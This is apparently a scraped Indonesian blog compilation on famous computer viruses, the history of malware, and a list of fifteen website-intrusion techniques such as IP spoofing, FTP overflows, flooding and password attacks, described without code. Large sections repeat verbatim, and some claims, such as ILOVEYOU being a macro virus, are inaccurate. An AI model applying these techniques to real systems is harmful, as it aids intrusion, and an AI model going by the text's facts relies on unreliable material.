Terdeteksi tahun Juni 1998 juga dikenal dengan nama Chernobil Virus, mampu menimbulkan kerugian sampai 800 milyar rupiah. Virus CIH menyerang setiap files .exe di komputer yang menggunakan sistem operasi Windows 98, Windows 95 dan Windows ME yang jadi korbanya. Sekali komputer anda terserang, virus ini akan terus berdiam diri di memory, sehingga akibatnya setiap anda menyalakan komputer, virus akan selalu aktif. Tidak hanya itu, virus CIH mampu menyebakan komputer anda tidak mau boot, karena semua file sistemnya telah ter-overwrite oleh si virus. Tapi saat ini, bagi pengguna Windows 2000, Windows XP ataupun Vista, virus ini bukan lagi sebuah ancaman.
MELISSA
Jum’at 26 Maret 1999, Virus Melissa menjadi buah bibir dimana-mana karena menginfeksi setiap PC yang menggunakan Microsoft Outlook. Virus ini bisa menyebar dengan cepat karena begitu komputer si korban terinfeksi, secara otomatis Melissa mengirimkan dirinya sendiri (dalam bentuk attachment file .doc) ke 50 alamat yang terdapat di kontak pada Microsoft Outlook. Begitu si korban membuka file .doc tersebut, maka virus Melissa secara otomatis aktif. Dari Intel sampai Microsoft dan beberapa perusahaan besar lainya yang menggunakan Microsoft Outlook, sampai terpaksa mematikan system emailnya, untuk mencegah penyebaran lebih jauh virus ini. kerugian yang ditimbulkan begitu fantastis karena hampir mencapai 6 Trilyun rupiah.
ILOVEYOU
Terdeteksi pertama kali di Hongkong pada 3 Mei 2000, menimbulkan kerugian yang sangat fantastis karena hampis mencapai ratusan trilyun rupiah. Dibuat dengan menggunakan Visual Basic Script, virus ini begitu menggoda karena menyebar melalui email dengan subject “ILOVEYOU”. Anda pasti penasaran kan kalau menerima sebuah email dengan embel-embel “ILOVEYOU”, dan virus ini memanfaatkan kepanasaran anda tersebut, karena begitu anda membuka email tersebut, secara otomatis virus menginfeksi komputer anda. Begitu komputer anda terinfeksi, si virus langsung mengirimkan dirinya sendiri pada semua alamat yang terdapat di kontak pada Microsoft Outlook.Virus ini dikenal juga dengan sebutan Loveletter dan The Love Bug.
CODE RED
Code Red menampakkan dirinya 13 Juli tahun 2001, dengan menyerang setiap server yang menggunakan Microsoft Internet Information Server (IIS). Worm atau virus ini memanfaatkan celah yang terbuka pada IIS System. Dikenal juga dengan istilah Bady, virus ini didesain untuk menimbulkan kerusakan yang sangat parah, karena mampu melakukan serangan Denial of Service pada IP-IP tertentu sehingga tak mengherankan mampu menimbulkan kerugian sampai ratusan trilyun rupiah, dan dalam waktu kurang dari seminggu saja 400.000 server berhasil ditaklukkan oleh virus ini.
BLASTER
Mampu menimbulkan kerugian sampai lebih dari 100 trilyun lebih, terdeteksi tahun 2003 juga dikenal dengan nama Lovsan atau MSBlast menyerang ribuan pengguna Windows 2000 dan Windows XP di seluruh dunia melalui traffic internet maupun network.
sumber:http://www.tasikisme.com/index.php?view=article&id=502:virus-virus-komputer-yang-paling-berbahaya-dan-merugikan&option=com_content&Itemid=58
CIH
Terdeteksi tahun Juni 1998 juga dikenal dengan nama Chernobil Virus, mampu menimbulkan kerugian sampai 800 milyar rupiah. Virus CIH menyerang setiap files .exe di komputer yang menggunakan sistem operasi Windows 98, Windows 95 dan Windows ME yang jadi korbanya. Sekali komputer anda terserang, virus ini akan terus berdiam diri di memory, sehingga akibatnya setiap anda menyalakan komputer, virus akan selalu aktif. Tidak hanya itu, virus CIH mampu menyebakan komputer anda tidak mau boot, karena semua file sistemnya telah ter-overwrite oleh si virus. Tapi saat ini, bagi pengguna Windows 2000, Windows XP ataupun Vista, virus ini bukan lagi sebuah ancaman.
MELISSA
Jum’at 26 Maret 1999, Virus Melissa menjadi buah bibir dimana-mana karena menginfeksi setiap PC yang menggunakan Microsoft Outlook. Virus ini bisa menyebar dengan cepat karena begitu komputer si korban terinfeksi, secara otomatis Melissa mengirimkan dirinya sendiri (dalam bentuk attachment file .doc) ke 50 alamat yang terdapat di kontak pada Microsoft Outlook. Begitu si korban membuka file .doc tersebut, maka virus Melissa secara otomatis aktif. Dari Intel sampai Microsoft dan beberapa perusahaan besar lainya yang menggunakan Microsoft Outlook, sampai terpaksa mematikan system emailnya, untuk mencegah penyebaran lebih jauh virus ini. kerugian yang ditimbulkan begitu fantastis karena hampir mencapai 6 Trilyun rupiah.
ILOVEYOU
Terdeteksi pertama kali di Hongkong pada 3 Mei 2000, menimbulkan kerugian yang sangat fantastis karena hampis mencapai ratusan trilyun rupiah. Dibuat dengan menggunakan Visual Basic Script, virus ini begitu menggoda karena menyebar melalui email dengan subject “ILOVEYOU”. Anda pasti penasaran kan kalau menerima sebuah email dengan embel-embel “ILOVEYOU”, dan virus ini memanfaatkan kepanasaran anda tersebut, karena begitu anda membuka email tersebut, secara otomatis virus menginfeksi komputer anda. Begitu komputer anda terinfeksi, si virus langsung mengirimkan dirinya sendiri pada semua alamat yang terdapat di kontak pada Microsoft Outlook.Virus ini dikenal juga dengan sebutan Loveletter dan The Love Bug.
CODE RED
Code Red menampakkan dirinya 13 Juli tahun 2001, dengan menyerang setiap server yang menggunakan Microsoft Internet Information Server (IIS). Worm atau virus ini memanfaatkan celah yang terbuka pada IIS System. Dikenal juga dengan istilah Bady, virus ini didesain untuk menimbulkan kerusakan yang sangat parah, karena mampu melakukan serangan Denial of Service pada IP-IP tertentu sehingga tak mengherankan mampu menimbulkan kerugian sampai ratusan trilyun rupiah, dan dalam waktu kurang dari seminggu saja 400.000 server berhasil ditaklukkan oleh virus ini.
BLASTER
Mampu menimbulkan kerugian sampai lebih dari 100 trilyun lebih, terdeteksi tahun 2003 juga dikenal dengan nama Lovsan atau MSBlast menyerang ribuan pengguna Windows 2000 dan Windows XP di seluruh dunia melalui traffic internet maupun network.
sumber:http://www.tasikisme.com/index.php?view=article&id=502:virus-virus-komputer-yang-paling-berbahaya-dan-merugikan&option=com_content&Itemid=58
VIRUS DARI DULU SAMPAI SEKARANG
Zaman Dulu
Virus Brain adalah virus pertama yang menyerang PC. Dibuat tahun 1986 oleh Basit dan Amjad dari Pakistan dengan tujuan memproteksi software buatan mereka tanpa bermaksud menebar teror. Pada masa tersebut banyak komputer terinfeksi virus Brain dan media penyebarannya hanya melalui disket 360KB (ada yang masih ingat disket 360 KB?)
Virus di dekade 80an sampai awal 90an masih menggunakan media disket sebagai penyebarannya. Penularannya umumnya di boot record dan file COM/EXE. Seakan tertantang virus lokalpun bermunculan. Pada era ini pembuat virus akan berusaha membuat virus ciptaannya sekecil mungkin sehingga sewaktu menginfeksi file lain pertambahan ukuran tidak terlalu kentara. Virus terkecil yang pernah ditemukan penulis pada masa itu hanya sekitar 50 bytes. Hal ini dikarenakan media penyimpanan ukuran besar masih belum tersedia. Untuk boot sector virus biasanya menyembunyikannya di track di luar jangkauan DOS di sektor 40 ke atas. Virus di era ini umumnya sangat ganas, kerap menghancurkan data pada saat tertentu yang sudah diprogramkan pembuatnya. Kekacauan ditambah lagi dengan beberapa Virus Generator dan yang beredar, seseorang tanpa kemampuan pemrogramanpun bisa membuat virus bermutasi.
Munculnya Windows 95 yang 32 bit dan menggunakan format PE (Portable Executable) yang berbeda dengan format EXE DOS membuat penyebaran virus zaman DOS nyaris tidak mungkin menginfeksi EXE PE Windows 95. Secara alami karena fasilitas dan kenyamanan yang lebih baik, pemakai bermigrasi ke Windows 95 dan meninggalkan DOS. Penularan virus EXE/COM zaman DOS praktis berhenti.
Era Internet Boom mulai di pertengahan 90an memunculkan mimpi buruk baru. Concept, virus pertama yang menginfeksi file dokumen Microsoft Word (dikenal sebagai Virus Macro). Di tahun tersebut Virus Macro seakan menjadi teror baru dan pertumbuhannya sangat pesat. Pembuatan virus Macro yang tidak memerlukan pengetahuan teknis yang mendalam seperti halnya virus era DOS dan kebiasaan orang berbagi dokumen memicu penyebarannya. Selain file Word, file Excel dan Powerpoint juga tidak luput dari incaran para pembuat virus.
Tahun 1999 di mana pemakaian Internet sudah intensif membuat Virus Macro memanfaatkan media ini untuk menggandakan diri. Melissa adalah virus Macro pertama yang cukup cerdas untuk ini. Melissa menggandakan dirinya ke dalam dokumen Word dan mengaitkankannya ke dalam e-mail dalam bentuk attachment dan mengirimkannya kepada 50 orang yang ada di Address Book di Microsoft Outlook. Saran pakar komputer untuk tidak membuka atau menjalankan file dari sumber/orang yang tidak anda kenal, terpatahkan sudah. Penyebarannya dengan metode ini sangat cepat, jauh melebihi yang diperkirakan sebelumnya, memaksa perusahaan besar yang online saat itu (bahkan Microsoft sendiri) untuk mematikan e-mail servernya untuk sementara waktu. Tahun 2000, I Love You, Virus Macro yang hampir serupa dengan Melissa memulai petualangannya. Pembuatnya adalah mahasiswa Filipina yang menggunakan virus ini sebagai skripsinya. Kesal skripsi virusnya ditolak, viruspun disebar. Efeknya jauh lebih besar dari Melissa. Social engineering adalah salah satu faktor sukses virus ini tesebar luas. Subject “I Love You” pada e-mail baru membuat orang penasaran ingin membuka dan membaca file yang diterima. Selain menginfeksi, virus ini juga akan mengirim username dan password via e-mail ke pembuatnya. Bahkan di dalam skripsinya tertulis motivasi dibuat “fasilitas” ini karena biaya internet yang mahal di negaranya. Virus ini mendapat publikasi yang cukup banyak dari media, bahkan sempat menjadi headline di majalah Time dan berlomba populer dengan topik Y2K Bug.
Masa Sekarang
Setelah era virus macro berakhir virus kemudian menargetkan kelemahan pada program atau sistem operasi tertentu dan memanfaatkannya. Nimda, Sasser, Codered dan Slammer adalah “tersangka” yang tidak asing lagi dalam menyebarkan diri dengan teknik tersebut. Menginfeksi ribuan komputer desktop dan server Windows hanya dalam hitungan jam.
Jadi bagaimana dengan virus sekarang ini? Virus dibuat tenggelam oleh popularitas “saudaranya”: worm dan trojan. Pembuatan worm dan trojan yang relatif mudah dan faktor ekonomisnya membuatnya menjadi primadona ancaman digital masa kini. Worm/Trojan diciptakan untuk mendapatkan informasi dari komputer yang diinfeksi, meliputi data pribadi, finansial dan lainnya. Data ini bisa dijual ke pihak lain atau dimanfaatkan oleh pembuat yang bersangkutan. Belum lagi jika pihak tertentu yang menyewa pembuat software berbahaya ini untuk membuat worm/trojan demi popularitas situs atau promosi berlebihan akan produk yang dijual atau bahkan produsen tak bermoral yang menggunakan worm berkemampuan engine SMTP untuk mengirim ratusan email promosi dengan bantuan PC yang diinfeksinya. Cara yang cukup efektif dan ekonomis, tanpa perlu membayar/menyewa e-mail server sendiri dan tidak perlu mengisi daftar e-mail calon korban. Semua itu akan dilakukan secara otomatis.
Worm/Trojan pun tidak perlu ber”diet” lagi seperti Virus classic tempoe doeloe. Sebuah Worm/Trojan berukuran 60KB atau 100 KB di belantara files berkapasitas ratusan Gigabyte seperti sekarang ini tentu sulit terdeteksi mata biasa. Efeknya pun tidak lagi sedahsyat virus zaman dulu yang memformat harddisk, merusak file system, menghapus semua file. Worm/Trojan semakin giat bersembunyi dan menggandakan diri secara diam-diam. Mereka belajar dari kegagalan virus dimana dengan efek keganasannya penyebaranpun menjadi lebih singkat.
Prediksi Akan Datang
Pencurian identitas akan menjadi trend baru. Semakin banyak orang yang terkoneksi di internet dan menggantungkan hidupnya pada komputer maka semakin banyak informasi terbuka yang bisa digali. Dengan maraknya situs sosial seperti friendster dan myspace akan semakin membuka kesempatan akan hal ini.
Keylogger yang dibonceng virus/worm/trojan (atau apapun namanya di masa depan) merekam setiap ketukan keyboard akan menjadi ancaman baru. Bayangkan bila semua surat, password dan documents yang diketikkan diketahui oleh orang lain. Tidak akan dijumpai lagi virus yang memformat atau menyebabkan kerusakan komputer karena OS yang semakin canggih akan semakin mempersempit celah untuk melakukan vandalisme seperti itu. Rootkit mungkin bisa menjadi primadona (walaupun sulit).
File berbahaya yang tidak terlihat oleh anda, tidak terdeteksi antivirus apapun, tidak bisa dicari dengan cara yang biasa disarankan tapi anda bisa merasakan keberadaannya, anda bisa melihat CPU cycle yang terpakai, jaringan anda terus menerus mengirimkan data. Infeksi komputer yang tidak terlihat, mungkin itulah istilah yang tepat. Virus router yang menginfeksi setiap router lewat IOS dan menyebabkan kelumpuhan internet. Mungkin itulah gambaran serangan virus di masa akan datang.
sumber :http://kamaruddin.jajanmedan.com/2006/11/24/virus-komputer-dulu-sekarang-dan-akan-datang/
Virus Brain adalah virus pertama yang menyerang PC. Dibuat tahun 1986 oleh Basit dan Amjad dari Pakistan dengan tujuan memproteksi software buatan mereka tanpa bermaksud menebar teror. Pada masa tersebut banyak komputer terinfeksi virus Brain dan media penyebarannya hanya melalui disket 360KB (ada yang masih ingat disket 360 KB?)
Virus di dekade 80an sampai awal 90an masih menggunakan media disket sebagai penyebarannya. Penularannya umumnya di boot record dan file COM/EXE. Seakan tertantang virus lokalpun bermunculan. Pada era ini pembuat virus akan berusaha membuat virus ciptaannya sekecil mungkin sehingga sewaktu menginfeksi file lain pertambahan ukuran tidak terlalu kentara. Virus terkecil yang pernah ditemukan penulis pada masa itu hanya sekitar 50 bytes. Hal ini dikarenakan media penyimpanan ukuran besar masih belum tersedia. Untuk boot sector virus biasanya menyembunyikannya di track di luar jangkauan DOS di sektor 40 ke atas. Virus di era ini umumnya sangat ganas, kerap menghancurkan data pada saat tertentu yang sudah diprogramkan pembuatnya. Kekacauan ditambah lagi dengan beberapa Virus Generator dan yang beredar, seseorang tanpa kemampuan pemrogramanpun bisa membuat virus bermutasi.
Munculnya Windows 95 yang 32 bit dan menggunakan format PE (Portable Executable) yang berbeda dengan format EXE DOS membuat penyebaran virus zaman DOS nyaris tidak mungkin menginfeksi EXE PE Windows 95. Secara alami karena fasilitas dan kenyamanan yang lebih baik, pemakai bermigrasi ke Windows 95 dan meninggalkan DOS. Penularan virus EXE/COM zaman DOS praktis berhenti.
Era Internet Boom mulai di pertengahan 90an memunculkan mimpi buruk baru. Concept, virus pertama yang menginfeksi file dokumen Microsoft Word (dikenal sebagai Virus Macro). Di tahun tersebut Virus Macro seakan menjadi teror baru dan pertumbuhannya sangat pesat. Pembuatan virus Macro yang tidak memerlukan pengetahuan teknis yang mendalam seperti halnya virus era DOS dan kebiasaan orang berbagi dokumen memicu penyebarannya. Selain file Word, file Excel dan Powerpoint juga tidak luput dari incaran para pembuat virus.
Tahun 1999 di mana pemakaian Internet sudah intensif membuat Virus Macro memanfaatkan media ini untuk menggandakan diri. Melissa adalah virus Macro pertama yang cukup cerdas untuk ini. Melissa menggandakan dirinya ke dalam dokumen Word dan mengaitkankannya ke dalam e-mail dalam bentuk attachment dan mengirimkannya kepada 50 orang yang ada di Address Book di Microsoft Outlook. Saran pakar komputer untuk tidak membuka atau menjalankan file dari sumber/orang yang tidak anda kenal, terpatahkan sudah. Penyebarannya dengan metode ini sangat cepat, jauh melebihi yang diperkirakan sebelumnya, memaksa perusahaan besar yang online saat itu (bahkan Microsoft sendiri) untuk mematikan e-mail servernya untuk sementara waktu. Tahun 2000, I Love You, Virus Macro yang hampir serupa dengan Melissa memulai petualangannya. Pembuatnya adalah mahasiswa Filipina yang menggunakan virus ini sebagai skripsinya. Kesal skripsi virusnya ditolak, viruspun disebar. Efeknya jauh lebih besar dari Melissa. Social engineering adalah salah satu faktor sukses virus ini tesebar luas. Subject “I Love You” pada e-mail baru membuat orang penasaran ingin membuka dan membaca file yang diterima. Selain menginfeksi, virus ini juga akan mengirim username dan password via e-mail ke pembuatnya. Bahkan di dalam skripsinya tertulis motivasi dibuat “fasilitas” ini karena biaya internet yang mahal di negaranya. Virus ini mendapat publikasi yang cukup banyak dari media, bahkan sempat menjadi headline di majalah Time dan berlomba populer dengan topik Y2K Bug.
Masa Sekarang
Setelah era virus macro berakhir virus kemudian menargetkan kelemahan pada program atau sistem operasi tertentu dan memanfaatkannya. Nimda, Sasser, Codered dan Slammer adalah “tersangka” yang tidak asing lagi dalam menyebarkan diri dengan teknik tersebut. Menginfeksi ribuan komputer desktop dan server Windows hanya dalam hitungan jam.
Jadi bagaimana dengan virus sekarang ini? Virus dibuat tenggelam oleh popularitas “saudaranya”: worm dan trojan. Pembuatan worm dan trojan yang relatif mudah dan faktor ekonomisnya membuatnya menjadi primadona ancaman digital masa kini. Worm/Trojan diciptakan untuk mendapatkan informasi dari komputer yang diinfeksi, meliputi data pribadi, finansial dan lainnya. Data ini bisa dijual ke pihak lain atau dimanfaatkan oleh pembuat yang bersangkutan. Belum lagi jika pihak tertentu yang menyewa pembuat software berbahaya ini untuk membuat worm/trojan demi popularitas situs atau promosi berlebihan akan produk yang dijual atau bahkan produsen tak bermoral yang menggunakan worm berkemampuan engine SMTP untuk mengirim ratusan email promosi dengan bantuan PC yang diinfeksinya. Cara yang cukup efektif dan ekonomis, tanpa perlu membayar/menyewa e-mail server sendiri dan tidak perlu mengisi daftar e-mail calon korban. Semua itu akan dilakukan secara otomatis.
Worm/Trojan pun tidak perlu ber”diet” lagi seperti Virus classic tempoe doeloe. Sebuah Worm/Trojan berukuran 60KB atau 100 KB di belantara files berkapasitas ratusan Gigabyte seperti sekarang ini tentu sulit terdeteksi mata biasa. Efeknya pun tidak lagi sedahsyat virus zaman dulu yang memformat harddisk, merusak file system, menghapus semua file. Worm/Trojan semakin giat bersembunyi dan menggandakan diri secara diam-diam. Mereka belajar dari kegagalan virus dimana dengan efek keganasannya penyebaranpun menjadi lebih singkat.
Prediksi Akan Datang
Pencurian identitas akan menjadi trend baru. Semakin banyak orang yang terkoneksi di internet dan menggantungkan hidupnya pada komputer maka semakin banyak informasi terbuka yang bisa digali. Dengan maraknya situs sosial seperti friendster dan myspace akan semakin membuka kesempatan akan hal ini.
Keylogger yang dibonceng virus/worm/trojan (atau apapun namanya di masa depan) merekam setiap ketukan keyboard akan menjadi ancaman baru. Bayangkan bila semua surat, password dan documents yang diketikkan diketahui oleh orang lain. Tidak akan dijumpai lagi virus yang memformat atau menyebabkan kerusakan komputer karena OS yang semakin canggih akan semakin mempersempit celah untuk melakukan vandalisme seperti itu. Rootkit mungkin bisa menjadi primadona (walaupun sulit).
File berbahaya yang tidak terlihat oleh anda, tidak terdeteksi antivirus apapun, tidak bisa dicari dengan cara yang biasa disarankan tapi anda bisa merasakan keberadaannya, anda bisa melihat CPU cycle yang terpakai, jaringan anda terus menerus mengirimkan data. Infeksi komputer yang tidak terlihat, mungkin itulah istilah yang tepat. Virus router yang menginfeksi setiap router lewat IOS dan menyebabkan kelumpuhan internet. Mungkin itulah gambaran serangan virus di masa akan datang.
sumber :http://kamaruddin.jajanmedan.com/2006/11/24/virus-komputer-dulu-sekarang-dan-akan-datang/
CARA HACKER MENJEBOL,MERUSAK WEBSITE ,DLL
Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:
1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.
Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.
Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.
11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
3. Unix Finger Exploits
